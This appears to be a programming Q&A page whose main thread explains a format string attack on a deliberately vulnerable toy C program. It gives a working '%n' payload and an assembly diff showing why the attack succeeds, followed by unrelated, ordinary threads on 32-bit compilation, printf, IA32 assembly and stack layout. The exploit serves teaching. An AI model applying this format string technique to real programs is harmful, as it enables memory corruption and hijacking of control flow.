#include <stdio.h>
int main()
{
char s[200]
int a=123;
int b=&a;
scanf("%50s",s);
printf(s);
if (a==31337)
func();
}
The aim is to execute a format string attack - to execute func() by inputting a string. I tried to use %n to overwrite the variable but I came to conclusion is that it is impossible without displaying b variable first and I have no idea how. Any hint would be appreciated. Sorry for my bad english.
Let's try with and without printing:
$ cat > f.c << \EOF
#include <stdio.h>
void func() {
fprintf(stderr, "func\n");
}
int main()
{
char s[200];
int a=123;
int b=&a;
#ifdef FIXER
fprintf(stderr, "%p\n", b); /* make "b" actually used somewhere */
#endif
scanf("%50s",s);
printf(s);
if (a==31337)
func();
}
EOF
$ gcc --version | head -n 1; uname -m
gcc (Debian 4.7.2-5) 4.7.2
i686
$ gcc -S f.c -o doesnt_work.s
f.c: In function 'main':
f.c:10:11: warning: initialization makes integer from pointer without a cast [enabled by default]
$ gcc -S -DFIXER f.c -o does_work.s
f.c: In function 'main':
f.c:10:11: warning: initialization makes integer from pointer without a cast [enabled by default]
$ gcc doesnt_work.s -o doesnt_work; gcc does_work.s -o does_work
$ echo '%31337p%n' | ./does_work > /dev/null
0xbfe75970
func
$ echo '%31337p%n' | ./doesnt_work > /dev/null
Segmentation fault
As stated in the question, we clearly see that without printing b first it fails.
Let's compare what is hapenning inside:
$ diff -ur does_work.s doesnt_work.s
--- does_work.s 2013-02-06 03:17:06.000000000 +0300
+++ doesnt_work.s 2013-02-06 03:16:52.000000000 +0300
## -29,8 +29,6 ##
.size func, .-func
.section .rodata
.LC1:
- .string "%p\n"
-.LC2:
.string "%50s"
.text
.globl main
## -48,15 +46,9 ##
movl $123, 16(%esp)
leal 16(%esp), %eax
movl %eax, 220(%esp)
- movl stderr, %eax
- movl 220(%esp), %edx /* !!! */
- movl %edx, 8(%esp) /* !!! */
- movl $.LC1, 4(%esp)
- movl %eax, (%esp)
- call fprintf
leal 20(%esp), %eax
movl %eax, 4(%esp)
- movl $.LC2, (%esp)
+ movl $.LC1, (%esp)
call __isoc99_scanf
leal 20(%esp), %eax
movl %eax, (%esp)
On marked lines we see "get value of b into %edx, then put it as 3'rd argument in stack."
As printf and scanf use cdecl call convention, the stack remains more or less the same across invocations, so that third argument remains available for the vulnerable printf for setting.
When we don't print b, it does not get into stack to be easily available for our injected format string.
With enough %p%p%p%p%p%p... we should be able to reach our actual a or b anyway, but the limitation of 50 input characters is getting in our way.
Related
I'm on Windows 11 in 64 bit machine and for didactic purpose I'm trying to compile in 32 bit a C code (.c) with linked Assebly code (.s), with the following command:
gcc -m32 <file.c> <file.s> -o <name_file>
but the compilation failed reporting the following error:
C:\Users\david\AppData\Local\Temp\ccQPXOVR.o:e2_main.c:(.text+0x1a): undefined reference to f collect2.exe: error: ld returned 1 exit status
The MinGW version that I use is: x86_64-8.1.0-posix-sjlj-rt_v6-rev0
I think the problem is in the ld linker, because compiling the same files but in 64 bits through the following command: gcc -m64 <file.c> <file.s> -o <name_file> does not give me an error (but it is not what I need, I need to compile them in 32 bits).
Below I report the code files that I should compile
<file.c>
#include <stdio.h>
int f(int x);
int score, trials;
void test(int x, int c) {
trials++;
int r = f(x);
printf("Test %d: %d [corretto: %d]\n", trials, r, c);
score += r == c;
}
int main() {
test(3, -2);
test(4, 5);
test(7, 50);
test(17, 460);
printf("Risultato: %d/%d\n", score, trials);
return 0;
}
<file.s>
.globl f
f:
movl 4(%esp), %ecx
movl %ecx, %eax
imull $2, %eax
imull %ecx, %eax
movl $7, %edx
imull %ecx, %edx
subl %edx, %eax
incl %eax
ret
Any ideas on how I can fix it?
I would hugely appreciate any suggestions or guidance on what to do or try next, as I am a little stuck and unsure from here.
I also try to compile an other C code with -m32 flag without linking anything and it seems to have worked.
I try to install i686-8.1.0-release-posix-sjlj-rt_v6-rev0 but it doesn't seem to change anything when I compile with -m32 .
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 1 year ago.
Improve this question
I've just started reading about C and currently playing around with format specifiers.
Here is the code example:
#include <stdio.h>
int main(void) {
char code = 'a' - 'A';
printf("\n>>>%c (%d)", code, code);
printf("\n>>>%c", 32);
char incode;
printf("\n\nGive me some char: ");
scanf("%c", &incode);
printf("\n>>>%c (%d)", incode, incode);
return 0;
}
The output:
PS C:\ex> ./print
>>> (32)
>>>
Give me some char: A
>>>A (65)
So, why does %c work in the last printf and doesn't work in the beginning?
I tested this sample on Windows and on Linux and both behave identically.
Windows compiler: gcc.exe (x86_64-posix-seh-rev0, Built by MinGW-W64 project) 8.1.0
Linux compiler: clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)
ASCII 32 is ' ' (space). It is printed alright, you just can't see it.
If you change the format string to "\n>>>%c<< (%d)" you will see it in the (pun) negative space.
You can also pass the output through od -a to confirm.
Assume that your character encoding is ASCII. Then a is encoded as 97 (decimal) and A is encoded as 65 (decimal). Their difference is 32, which encodes the space character.
So char code = 'a' - 'A'; is the same as char code = 32; which is the same as the declaration char code = ' ';
See also this C reference website.
If allowed, compile with all warnings and debug info, so (with GCC) as gcc -Wall -Wextra -g
You could compile your C source code minerals.c with gcc -Wall -O -fverbose-asm minerals.c -S -o minerals.s and look inside the generated assembler code foo.s. On my Debian computer with GCC 10.2 I am getting the following warning:
minerals.c: In function ‘main’:
minerals.c:11:5: warning: ignoring return value of ‘scanf’ declared with attribute ‘warn_unused_result’ [-Wunused-result]
11 | scanf("%c", &incode);
| ^~~~~~~~~~~~~~~~~~~~
The generated assembler code has:
# /usr/include/x86_64-linux-gnu/bits/stdio2.h:107: return __printf_chk (__USE_FORTIFY_LEVEL - 1, __fmt, __va_arg_pack ());
movl $32, %ecx #,
movl $32, %edx #,
leaq .LC0(%rip), %rsi #,
movl $1, %edi #,
call __printf_chk#PLT #
movl $32, %edx #, // 32 is the space
leaq .LC1(%rip), %rsi #,
movl $1, %edi #,
movl $0, %eax #,
call __printf_chk#PLT #
leaq .LC2(%rip), %rsi #,
movl $1, %edi #,
movl $0, %eax #,
call __printf_chk#PLT #
Actually, in 2021, UTF-8 is used everywhere (and complicates matter). Look into GNU libunistring.
Good evening, i'm trying to translate this code of mine from C to assembly IA32:
int i=0;
char s[3]; char c[n];
for(i=0;i<3;i++){
s[i]=c[i];
}
n is a char that receives a value from user. By the time this "for" it's executing "c" is already filled with chars. I want, as you can see, fill "s" with the three first entries of "c". I translated this code to assembly like this:
.data
is: .asciz "%s"
id: .asciz "%d"
.bss
.comm c,500,1
.comm s,500,1
.comm n,4,4
.global main
main:
#asking for string to fill "c"
pushl $c
pushl $is
call scanf
addl $8,%esp
#asking for integer to know how long is c
pushl $n
pushl $id
call scanf
addl $8,%esp
movl $0,%eax
for:
cmpl $3,%eax
jge endfor
movb c(%eax),%cl
movb %cl,s(%eax)
incl %eax
jmp for
endfor:
movl $0,%eax
pushl %eax
pushl $s
pushl $is
call printf
addl $8,%ebp
popl %eax
Thing is when i execute this code it doesn't print anything at all, it's like "s" array it's empty, i've tried several things and nothing has worked so far. Any assembly genius to give me a hand?
:-) Thanks!
Following worked fine for me:
.data
is: .asciz "%s"
id: .asciz "%d"
.bss
.comm c,500,1
.comm s,500,1
.comm n,4,4
.text
.global main
main:
#asking for string to fill "c"
pushl $c
pushl $is
call scanf
addl $8,%esp
#asking for integer to know how long is c
pushl $n
pushl $id
call scanf
addl $8,%esp
movl $0,%eax
for:
cmpl $3,%eax
jge endfor
movb c(%eax),%cl
movb %cl,s(%eax)
incl %eax
jmp for
endfor:
movl $0,%eax
pushl %eax
pushl $s
pushl $is
call printf
addl $8,%esp
popl %eax
ret
Code belongs in .text, not in .bss
addl $8,%ebp near end should have been addl $8,%esp to fix stack pointer after printf call
needed ret at the end of main
you probably should explicitly store a nul terminator at the end of the string (unless you're expecting to copy it from the source string). I didn't make that change, however.
I don't think I changed anything else.
Assembled and linked with:
as -g -32 test.s -o test.o
gcc -g -m32 test.o
Input:
abc 3
Output:
abc
My c code:
#include <stdio.h>
foo()
{
char buffer[8];
}
main()
{
foo();
return 0;
}
I compile it using gcc -ggdb -mpreferred-stack-boundary=2 -o bar bar.c
When I load it using GDB ./bar I see that inside the foo function the code is:
sub $0x0c,$esp
Why is this happening?
I want to buffer to take 8 bytes in the stack so it should be sub $0x8,$esp!
Why can't I set stack boundary to 4 bytes?
Help!
I can't reproduce exactly what you are seeing, but on my 4.8.2 version of gcc, the option does affect the amount of stack used with this code (make sure "buffer" is used to avoid it being optimised away, and fix the warnings for no return type/argument types):
#include <stdio.h>
void foo(void)
{
char buffer[8];
buffer[0] = 'a';
buffer[1] = '\n';
buffer[2] = 0;
printf("my first program! %s\n", buffer);
}
int main()
{
foo();
return 0;
}
Compiled with -mpreferred-stack-boundary=2 and -mpreferred-stack-boundary=4, and the difference between the generated assembler is notable:
$ diff -u stb-2.s stb-4.s
--- stb-2.s 2014-04-10 09:00:39.546038191 +0100
+++ stb-4.s 2014-04-10 09:00:58.895108979 +0100
## -15,11 +15,11 ##
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
- subl $16, %esp
- movb $97, -8(%ebp)
- movb $10, -7(%ebp)
- movb $0, -6(%ebp)
- leal -8(%ebp), %eax
+ subl $40, %esp
+ movb $97, -16(%ebp)
+ movb $10, -15(%ebp)
+ movb $0, -14(%ebp)
+ leal -16(%ebp), %eax
movl %eax, 4(%esp)
movl $.LC0, (%esp)
.LEHB0:
## -67,9 +67,10 ##
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
+ andl $-16, %esp
call _Z3foov
movl $0, %eax
- popl %ebp
+ leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
So, at least in gcc 4.8.2. for x86-32, the option has an effect.
Of course, the default according to the docs is -mpreferred-stack-boundary=2, so maybe that's why you can't see any difference from "without" (Although in my experiments, it seems that it's -mpreferred-stack-boundary=4). [Moment passes] Ah, the default has been changed over time, so the 4.4.2 docs online says 2, my info gcc for 4.8.2 says 4, which explains the difference.
As to why your code is allocating twelve bytes of stack-space - look at how printf is called:
movl $.LC0, (%esp)
call printf
If the compiler can, it will pre-allocate argument space for function calls at the start of the function, rather than use push $.LC0 as it would be in this case. It's not much difference, but it saves at least one instruction for cleanup at the other side of printf (and it makes it MUCH easier to deal with stack-relative offsets within the produced code, since the compiler doesn't have to keep track of where the current stack-pointer is - it's always at a constant place after the prologue code at the beginning of the function, all the way to the end of the function). Since the space is ultimately required anyway, there's no point in "saving 4 bytes".
The C function backtrace just returns a series of functions calls for the programn, but i want to list all the locals variables in my programn, just like the info locals in gdb.Any idea if this can be done? Thanks
Generally, no. You should move away from thinking about a "stack" as some sort of god given factum. A call stack is merely a common implementation technique for C. It has no intrinsic meaning or required semantics. Automatic variables ("local variables", as you say) have to behave in a certain way, and sometimes that means that they are written onto the call stack. However, it is entirely conceivable that local variables are never realized in memory at all -- they may instead only ever be stored in a processor register, or eliminated entirely if an equivalent program can be formulated without them.
So, no, there is no language-intrinsic mechanism for enumerating local variables. As you say, the debugger can do so to some extent (depending on debug symbols being present and subject to optimizations); perhaps you can find a library that can process debug symbols from within a running program.
If this is just for occasional debugging, then you can invoke the debugger. However, since the debugger itself will freeze your program, you need an intermediary to capture the output. You can, for example, use system, and redirect the output to a file, then read the file afterwards. In the example below, the file gdbcmds.txt contains the line info locals.
char buf[512];
FILE *gdb;
snprintf(buf, sizeof(buf), "gdb -batch -x gdbcmds.txt -p %d > gdbout.txt",
(int)getpid());
system(buf);
gdb = fopen("gdbout.txt", "r");
while (fgets(buf, sizeof(buf), gdb) != 0) {
printf("%s", buf);
}
fclose(gdb);
First, note that backtrace is not a standard C library function, but a GNU-specific extension.
In general, it's difficult to impossible retrieve local variable information from compiled code, especially if it was compiled without debugging or with optimization enabled. If debugging isn't turned on, variable names and types are generally not preserved in the resulting machine code.
For example, take the following ridiculously simple code:
#include <stdio.h>
#include <math.h>
int main(void)
{
int x = 1, y = 2, z;
z = 2 * y - x;
printf("x = %d, y = %d, z = %d\n", x, y, z);
return 0;
}
Here's the resulting machine code, no debugging or optimization:
.file "varinfo.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "x = %d, y = %d, z = %d\n"
.text
.align 4
.globl main
.type main,#function
main:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $1, -4(%ebp)
movl $2, -8(%ebp)
movl -8(%ebp), %eax
movl %eax, %eax
sall $1, %eax
subl -4(%ebp), %eax
movl %eax, -12(%ebp)
pushl -12(%ebp)
pushl -8(%ebp)
pushl -4(%ebp)
pushl $.LC0
call printf
addl $16, %esp
movl $0, %eax
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)"
x, y, and z are referred to through -4(%ebp), -8(%ebp), and -12(%ebp) respectively. There's nothing to indicate that they're integers other than the instructions used to perform the arithmetic.
It's even better with optimization (-O1) turned on:
.file "varinfo.c"
.version "01.01"
gcc2_compiled.:
.section .rodata.str1.1,"ams",#progbits,1
.LC0:
.string "x = %d, y = %d, z = %d\n"
.text
.align 4
.globl main
.type main,#function
main:
pushl %ebp
movl %esp, %ebp
subl $8, %esp
pushl $3
pushl $2
pushl $1
pushl $.LC0
call printf
movl $0, %eax
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.2 2.96-112.7.2)"
In this case, the compiler was able to do some static analysis and compute the value z at compile time; there's no need to set aside any memory for any of the variables at all, because the compiler already knows what those values have to be.